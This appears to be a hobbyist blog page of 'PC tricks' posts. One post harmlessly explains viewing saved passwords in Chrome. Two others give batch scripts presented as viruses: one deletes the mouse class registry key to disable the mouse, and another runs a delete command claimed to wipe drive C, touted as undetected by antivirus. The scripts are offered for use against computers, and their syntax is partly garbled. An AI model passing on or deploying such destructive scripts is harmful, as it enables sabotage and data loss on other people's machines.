Skip to main content

Posts

Showing posts with the label PC TRICKZ

How to view saved password in google chrome ?

Hi guys, this a assume tricks to view any saved password in Google chrome. We are all known about Google chrome which is the most popularwebbrowser, so you can easily find your saved password if you are forgetting. Step-1: At first open Google chrome and go to “settings” (top rightcorner)Screenshot -1 Step-2: Now scroll down and click “Show advance settings”.Screenshot -2 Step-3: Then go to “password and forms” and click“Managesavedpassword” here you must see list of all websites whose passwords aresavedin the browser will be listed.Screenshot -3 Step-4: Now select which website passwordyouwill see.Screenshot -4That’s it. Hope you enjoy so much in thistricks... ??!!

Make ALKR Virus That Disable Mouse

Today we will be making a batch virus which is harm-full it willdisableyour mouseso think before trying it on yourself. How To Disable Mouse 1. OpenNotepadand copy below codes rem ---------------------------------rem Disable Mouseset key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4rem --------------------------------- 2. Save this file as alkr.bat 3. Done you just created your virus.

HOW TO MAKE ALKR VIRUS ON PC

In my previous post i had teach you guys to createvirus that disable mouseandVirus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus. What will this virus do ? You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post aboutLearn Batch Programming. How to Make the virus ?1. #OpenNotepadand copy below code into it. @Echo offDel C:\ *.* |y # Save this file ALKR.bat(Name cant be changed) # Now, running this file will deleteall the content ofC Drive. Warning:Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not ...